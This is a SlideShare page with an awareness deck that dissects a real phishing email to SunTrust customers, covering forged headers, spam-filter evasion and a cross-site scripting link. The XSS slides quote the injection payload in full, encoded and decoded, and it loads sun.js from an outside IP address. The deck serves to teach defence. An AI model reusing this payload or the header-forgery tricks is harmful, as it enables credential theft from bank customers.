SlideShare uma empresa Scribd logo
1 de 26
Deconstructing A  Phishing Scheme Christopher Duffy, CISSP
Agenda Definition Examples Breakdown  Follow Through Statistics Sites
Defined "phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“ 				-Wikipedia
Catching a Phish Complete Attack  1st effort to use clients as relay Cross- Site Scripting Attack email was not sent from the bank. e web page it linked to contained extra characters in the URL address line - added on to the bank’s legitimate web address page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.
Email Breakdown Header Info Incorrect Return Address Return-Path: billing@suntrust.com  The return address is generated from the From: address and applied by the final SMTP server to handle the message.  Most scams forge the From: address.  This can be the only obfuscation a phisher employs;  forging From: headers is a trivial task, and is often a feature of normal client mail user agents.
True Received: Header Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75)  Received: headers are written in reverse; in this case, 82.67.84.75 is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy  Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher
Forged Received: Header  Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263) This Received: line is forged. Some anti-spam software will trust the Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique.  Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “billing@suntrust.com” string in the fake server name; normal server names cannot have @-signs in their name.  The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam.
Incorrect Time Stamp Tue, 12 Nov 2008 07:12:03 -0100  Timestamp Most LikelyFrom a Comprimised PC (Out of SyncClock)
Forged From: Name and Address From: Suntrust Billing Departmentbilling@suntrust.com the forged From: field is reflected in the Return-Path field Most Likely a True email within Suntrust Impersonal To: Name, if Any To: Valued Suntrust Customer ,or To:emailname@isp.com No Salutation
Threats Account Compromised Suspension Upgrades in the Name of Security Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.Proceed to customer service department>>
No RTF HTML-only message Content-Type: text/html; Delivered in HTML only, no RTF, or plain text. Mail User Agent (MUA) Compatibility
What??? Spurious Random Words Content-Description: lonesome hysteria ulterior Randomizer to avoid Bayesian Spam Filters
Hijacked ,[object Object]
Linked Directly to Site
Sense of Legitimacy,[object Object]
XSS Cross Site Scripting Attacks Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.
XSS Deconstruction <a title=3D"http://suntrust.com/" target=3D"_blank" herf=3D"http://www.sun= trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45= wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br> SCREEN TIP TARGET OBSFUCATION <a title=3D"http://suntrust.com/" target=3D"_blank“ Mouse Over to distract from real target link
XSS Payload Link to True Site herf=3D"http://www.sun= trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45= Link target is Suntrust, following is XSS Payload (HEX) wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>
HEX DeCoded Hex-encoded HTTP parameters string. Decoded, it reads "><SCRIPTlanguage=javascriptsrc="http://218.103.23.138:8081/sun/sun.js"</SCRIPT> Link Executes  sun.js 218.103.23.138 Resolves to ISP in Hong Kong
Top Phishing Keyloggers & Maclious Code, up 93% from ’07 ISP’s IRS
Mitigation Through Education Don’t click to Follow Don’t trust Links No Personal Information via email Check out the URL Let your Fingers Do the Walking  Type it In !
SecurityCartoon.com
More Information Internet Crime Center www.ic3.gov Identity Theft: What to do if It Happens to You http://www.privacyrights.org/fs/fs17a.htm Federal Trade Commission phishing information http://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm Video tutorial on phishing: http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php Microsoft Phishing Information Website http://www.microsoft.com/protect/yourself/phishing/identify.mspx
Anti-Phishing  Non Profit Sites www.antiphishing.org www.apwg.com www.bestsecuritytips.com www.cyberstreet.org Carnigie Mellon University Game http://cups.cs.cmu.edu/antiphishing_phil/new/index.html

Mais conteúdo relacionado

Mais procurados

Types of impersonating
Types of impersonatingTypes of impersonating
Types of impersonatingSOCRadar Inc
 
Phising a Threat to Network Security
Phising a Threat to Network SecurityPhising a Threat to Network Security
Phising a Threat to Network Securityanjuselina
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORTvineetkathan
 
phishing and pharming - evil twins
phishing and pharming - evil twinsphishing and pharming - evil twins
phishing and pharming - evil twinsNilantha Piyasiri
 
Anonymous email 26 aug14
Anonymous email 26 aug14Anonymous email 26 aug14
Anonymous email 26 aug14Naval OPSEC
 
Normshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing ReportNormshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing ReportNormShield
 
Seminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII SemSeminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII SemNarendra Singh
 
PhishingandPharming
PhishingandPharmingPhishingandPharming
PhishingandPharmingDawn Hicks
 
The Difference between Pharming and Phishing
The Difference between Pharming and PhishingThe Difference between Pharming and Phishing
The Difference between Pharming and PhishingMason Bird
 
Spear Phishing 101
Spear Phishing 101Spear Phishing 101
Spear Phishing 101Sendio
 
Phishing: Swiming with the sharks
Phishing: Swiming with the sharksPhishing: Swiming with the sharks
Phishing: Swiming with the sharksNalneesh Gaur
 
Phishing attack types and mitigation strategies
Phishing attack types and mitigation strategiesPhishing attack types and mitigation strategies
Phishing attack types and mitigation strategiesSarim Khawaja
 
Malware from the Consumer Jungle
Malware from the Consumer JungleMalware from the Consumer Jungle
Malware from the Consumer JungleJason S
 
IJSRED-V2I4P0
IJSRED-V2I4P0IJSRED-V2I4P0
IJSRED-V2I4P0IJSRED
 
ICT-phishing
ICT-phishingICT-phishing
ICT-phishingMH BS
 

Mais procurados (20)

Introduction to phishing
Introduction to phishingIntroduction to phishing
Introduction to phishing
 
Phishing
PhishingPhishing
Phishing
 
Types of impersonating
Types of impersonatingTypes of impersonating
Types of impersonating
 
Phising a Threat to Network Security
Phising a Threat to Network SecurityPhising a Threat to Network Security
Phising a Threat to Network Security
 
PHISHING PROJECT REPORT
PHISHING PROJECT REPORTPHISHING PROJECT REPORT
PHISHING PROJECT REPORT
 
phishing and pharming - evil twins
phishing and pharming - evil twinsphishing and pharming - evil twins
phishing and pharming - evil twins
 
Intro phishing
Intro phishingIntro phishing
Intro phishing
 
Phishing attack
Phishing attackPhishing attack
Phishing attack
 
PHISHING attack
PHISHING attack PHISHING attack
PHISHING attack
 
Anonymous email 26 aug14
Anonymous email 26 aug14Anonymous email 26 aug14
Anonymous email 26 aug14
 
Normshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing ReportNormshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing Report
 
Seminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII SemSeminaar Report of Phishing VIII Sem
Seminaar Report of Phishing VIII Sem
 
PhishingandPharming
PhishingandPharmingPhishingandPharming
PhishingandPharming
 
The Difference between Pharming and Phishing
The Difference between Pharming and PhishingThe Difference between Pharming and Phishing
The Difference between Pharming and Phishing
 
Spear Phishing 101
Spear Phishing 101Spear Phishing 101
Spear Phishing 101
 
Phishing: Swiming with the sharks
Phishing: Swiming with the sharksPhishing: Swiming with the sharks
Phishing: Swiming with the sharks
 
Phishing attack types and mitigation strategies
Phishing attack types and mitigation strategiesPhishing attack types and mitigation strategies
Phishing attack types and mitigation strategies
 
Malware from the Consumer Jungle
Malware from the Consumer JungleMalware from the Consumer Jungle
Malware from the Consumer Jungle
 
IJSRED-V2I4P0
IJSRED-V2I4P0IJSRED-V2I4P0
IJSRED-V2I4P0
 
ICT-phishing
ICT-phishingICT-phishing
ICT-phishing
 

Destaque

Cyber Crime Seminar Jan 2015
Cyber Crime Seminar Jan 2015Cyber Crime Seminar Jan 2015
Cyber Crime Seminar Jan 2015Kevin Murphy
 
Cyber risk trends in 2015
Cyber risk trends in 2015Cyber risk trends in 2015
Cyber risk trends in 2015Wynyard Group
 
10 Steps to Creating a Corporate Phishing Awareness Program
10 Steps to Creating a Corporate Phishing Awareness Program10 Steps to Creating a Corporate Phishing Awareness Program
10 Steps to Creating a Corporate Phishing Awareness ProgramWiley
 
Rafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack ChainRafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack Chaincentralohioissa
 
Spear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaSpear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaRaghunath G
 
Phishing - A modern web attack
Phishing -  A modern web attackPhishing -  A modern web attack
Phishing - A modern web attackKarthik
 
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Er. Rahul Jain
 
Traditional problem associated with cyber crime
Traditional problem associated with cyber crimeTraditional problem associated with cyber crime
Traditional problem associated with cyber crimevishalgohel12195
 
CFMA Cyber Crime Presentation
CFMA Cyber Crime PresentationCFMA Cyber Crime Presentation
CFMA Cyber Crime PresentationSteve Machesney
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanControlScan, Inc.
 
Cyber crime in a Smart Phone & Social Media Obsessed World
Cyber crime in a Smart Phone & Social Media Obsessed WorldCyber crime in a Smart Phone & Social Media Obsessed World
Cyber crime in a Smart Phone & Social Media Obsessed WorldJohn Palfreyman
 
CYBER CRIME( DU PRESENTATION FOR FYUP)
CYBER CRIME( DU PRESENTATION FOR FYUP)CYBER CRIME( DU PRESENTATION FOR FYUP)
CYBER CRIME( DU PRESENTATION FOR FYUP)Siddharth Anand
 

Destaque (20)

2 phishing
2 phishing2 phishing
2 phishing
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
 
Cyber Crime Seminar Jan 2015
Cyber Crime Seminar Jan 2015Cyber Crime Seminar Jan 2015
Cyber Crime Seminar Jan 2015
 
Cyberextortion
CyberextortionCyberextortion
Cyberextortion
 
Cyber risk trends in 2015
Cyber risk trends in 2015Cyber risk trends in 2015
Cyber risk trends in 2015
 
Current Trends in Cyber Crime 2015
Current Trends in Cyber Crime 2015Current Trends in Cyber Crime 2015
Current Trends in Cyber Crime 2015
 
10 Steps to Creating a Corporate Phishing Awareness Program
10 Steps to Creating a Corporate Phishing Awareness Program10 Steps to Creating a Corporate Phishing Awareness Program
10 Steps to Creating a Corporate Phishing Awareness Program
 
Spear phishing attacks
Spear phishing attacksSpear phishing attacks
Spear phishing attacks
 
Rafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack ChainRafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack Chain
 
Spear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaSpear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishna
 
Phishing - A modern web attack
Phishing -  A modern web attackPhishing -  A modern web attack
Phishing - A modern web attack
 
CFAR
CFARCFAR
CFAR
 
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
Phishing attacks, Types Of Phishing Attacks, How To Avoid Phishing Attacks
 
Traditional problem associated with cyber crime
Traditional problem associated with cyber crimeTraditional problem associated with cyber crime
Traditional problem associated with cyber crime
 
CFMA Cyber Crime Presentation
CFMA Cyber Crime PresentationCFMA Cyber Crime Presentation
CFMA Cyber Crime Presentation
 
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScanHow to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
How to Spot and Combat a Phishing Attack - Cyber Security Webinar | ControlScan
 
Cyber crime in a Smart Phone & Social Media Obsessed World
Cyber crime in a Smart Phone & Social Media Obsessed WorldCyber crime in a Smart Phone & Social Media Obsessed World
Cyber crime in a Smart Phone & Social Media Obsessed World
 
Phishing attack till now
Phishing attack till nowPhishing attack till now
Phishing attack till now
 
Cyber Security Terms
Cyber Security TermsCyber Security Terms
Cyber Security Terms
 
CYBER CRIME( DU PRESENTATION FOR FYUP)
CYBER CRIME( DU PRESENTATION FOR FYUP)CYBER CRIME( DU PRESENTATION FOR FYUP)
CYBER CRIME( DU PRESENTATION FOR FYUP)
 

Semelhante a Deconstructing A Phishing Scheme

Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internetRohan Bharadwaj
 
need help with a term paper 8 pages Write a term paper that discusse.pdf
need help with a term paper 8 pages Write a term paper that discusse.pdfneed help with a term paper 8 pages Write a term paper that discusse.pdf
need help with a term paper 8 pages Write a term paper that discusse.pdfanjandavid
 
Improving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association MiningImproving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association Miningtheijes
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresIRJET Journal
 
Email threat detection and mitigation
Email threat detection and mitigationEmail threat detection and mitigation
Email threat detection and mitigationNimishaRawat
 
A guide to email spoofing
A guide to email spoofingA guide to email spoofing
A guide to email spoofingMattChapman50
 
3 pervasive phishing scams
3 pervasive phishing scams3 pervasive phishing scams
3 pervasive phishing scamsSafeSpaceOnline
 
The Phishing Ecosystem
The Phishing EcosystemThe Phishing Ecosystem
The Phishing Ecosystemamiable_indian
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresIRJET Journal
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior
 
P H I S H I N G
P H I S H I N GP H I S H I N G
P H I S H I N Gtemi
 

Semelhante a Deconstructing A Phishing Scheme (20)

Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
 
Phishing
PhishingPhishing
Phishing
 
need help with a term paper 8 pages Write a term paper that discusse.pdf
need help with a term paper 8 pages Write a term paper that discusse.pdfneed help with a term paper 8 pages Write a term paper that discusse.pdf
need help with a term paper 8 pages Write a term paper that discusse.pdf
 
Improving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association MiningImproving Phishing URL Detection Using Fuzzy Association Mining
Improving Phishing URL Detection Using Fuzzy Association Mining
 
Phishing
PhishingPhishing
Phishing
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Email threat detection and mitigation
Email threat detection and mitigationEmail threat detection and mitigation
Email threat detection and mitigation
 
A guide to email spoofing
A guide to email spoofingA guide to email spoofing
A guide to email spoofing
 
Safe Email Practices
Safe Email PracticesSafe Email Practices
Safe Email Practices
 
Phishing
PhishingPhishing
Phishing
 
3 pervasive phishing scams
3 pervasive phishing scams3 pervasive phishing scams
3 pervasive phishing scams
 
The Phishing Ecosystem
The Phishing EcosystemThe Phishing Ecosystem
The Phishing Ecosystem
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Internet scams
Internet scamsInternet scams
Internet scams
 
Web Security
Web SecurityWeb Security
Web Security
 
Phishing
PhishingPhishing
Phishing
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
 
Phis
PhisPhis
Phis
 
P H I S H I N G
P H I S H I N GP H I S H I N G
P H I S H I N G
 
Phishing
PhishingPhishing
Phishing
 

Mais de Christopher Duffy

Big data Overview for SLDS in Education
Big data Overview for SLDS in EducationBig data Overview for SLDS in Education
Big data Overview for SLDS in EducationChristopher Duffy
 
How to Select a Learning Management Platform (LMS)
How to Select a Learning Management Platform (LMS)How to Select a Learning Management Platform (LMS)
How to Select a Learning Management Platform (LMS)Christopher Duffy
 
Helpdesk Service Level Agreements
Helpdesk Service Level AgreementsHelpdesk Service Level Agreements
Helpdesk Service Level AgreementsChristopher Duffy
 
Voice Over IP Overview w/Secuirty
Voice Over IP Overview w/SecuirtyVoice Over IP Overview w/Secuirty
Voice Over IP Overview w/SecuirtyChristopher Duffy
 

Mais de Christopher Duffy (9)

Big data Overview for SLDS in Education
Big data Overview for SLDS in EducationBig data Overview for SLDS in Education
Big data Overview for SLDS in Education
 
How to Select a Learning Management Platform (LMS)
How to Select a Learning Management Platform (LMS)How to Select a Learning Management Platform (LMS)
How to Select a Learning Management Platform (LMS)
 
Helpdesk Service Level Agreements
Helpdesk Service Level AgreementsHelpdesk Service Level Agreements
Helpdesk Service Level Agreements
 
Green Data Center
Green Data CenterGreen Data Center
Green Data Center
 
Going Mobile !
Going Mobile !Going Mobile !
Going Mobile !
 
H1N1 & IT Continuity
H1N1 & IT ContinuityH1N1 & IT Continuity
H1N1 & IT Continuity
 
Avaya VoIP Presentation
Avaya VoIP PresentationAvaya VoIP Presentation
Avaya VoIP Presentation
 
Voice Over IP Overview w/Secuirty
Voice Over IP Overview w/SecuirtyVoice Over IP Overview w/Secuirty
Voice Over IP Overview w/Secuirty
 
Leveraging Your B2C portal
Leveraging Your B2C portalLeveraging Your B2C portal
Leveraging Your B2C portal
 

Deconstructing A Phishing Scheme

  • 1. Deconstructing A Phishing Scheme Christopher Duffy, CISSP
  • 2. Agenda Definition Examples Breakdown Follow Through Statistics Sites
  • 3. Defined "phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“ -Wikipedia
  • 4.
  • 5.
  • 6. Catching a Phish Complete Attack 1st effort to use clients as relay Cross- Site Scripting Attack email was not sent from the bank. e web page it linked to contained extra characters in the URL address line - added on to the bank’s legitimate web address page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.
  • 7. Email Breakdown Header Info Incorrect Return Address Return-Path: billing@suntrust.com The return address is generated from the From: address and applied by the final SMTP server to handle the message. Most scams forge the From: address. This can be the only obfuscation a phisher employs; forging From: headers is a trivial task, and is often a feature of normal client mail user agents.
  • 8. True Received: Header Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) Received: headers are written in reverse; in this case, 82.67.84.75 is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher
  • 9. Forged Received: Header Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263) This Received: line is forged. Some anti-spam software will trust the Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique. Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “billing@suntrust.com” string in the fake server name; normal server names cannot have @-signs in their name. The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam.
  • 10. Incorrect Time Stamp Tue, 12 Nov 2008 07:12:03 -0100 Timestamp Most LikelyFrom a Comprimised PC (Out of SyncClock)
  • 11. Forged From: Name and Address From: Suntrust Billing Departmentbilling@suntrust.com the forged From: field is reflected in the Return-Path field Most Likely a True email within Suntrust Impersonal To: Name, if Any To: Valued Suntrust Customer ,or To:emailname@isp.com No Salutation
  • 12. Threats Account Compromised Suspension Upgrades in the Name of Security Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.Proceed to customer service department>>
  • 13. No RTF HTML-only message Content-Type: text/html; Delivered in HTML only, no RTF, or plain text. Mail User Agent (MUA) Compatibility
  • 14. What??? Spurious Random Words Content-Description: lonesome hysteria ulterior Randomizer to avoid Bayesian Spam Filters
  • 15.
  • 17.
  • 18. XSS Cross Site Scripting Attacks Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.
  • 19. XSS Deconstruction <a title=3D"http://suntrust.com/" target=3D"_blank" herf=3D"http://www.sun= trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45= wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br> SCREEN TIP TARGET OBSFUCATION <a title=3D"http://suntrust.com/" target=3D"_blank“ Mouse Over to distract from real target link
  • 20. XSS Payload Link to True Site herf=3D"http://www.sun= trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45= Link target is Suntrust, following is XSS Payload (HEX) wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>
  • 21. HEX DeCoded Hex-encoded HTTP parameters string. Decoded, it reads "><SCRIPTlanguage=javascriptsrc="http://218.103.23.138:8081/sun/sun.js"</SCRIPT> Link Executes sun.js 218.103.23.138 Resolves to ISP in Hong Kong
  • 22. Top Phishing Keyloggers & Maclious Code, up 93% from ’07 ISP’s IRS
  • 23. Mitigation Through Education Don’t click to Follow Don’t trust Links No Personal Information via email Check out the URL Let your Fingers Do the Walking Type it In !
  • 25. More Information Internet Crime Center www.ic3.gov Identity Theft: What to do if It Happens to You http://www.privacyrights.org/fs/fs17a.htm Federal Trade Commission phishing information http://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm Video tutorial on phishing: http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php Microsoft Phishing Information Website http://www.microsoft.com/protect/yourself/phishing/identify.mspx
  • 26. Anti-Phishing Non Profit Sites www.antiphishing.org www.apwg.com www.bestsecuritytips.com www.cyberstreet.org Carnigie Mellon University Game http://cups.cs.cmu.edu/antiphishing_phil/new/index.html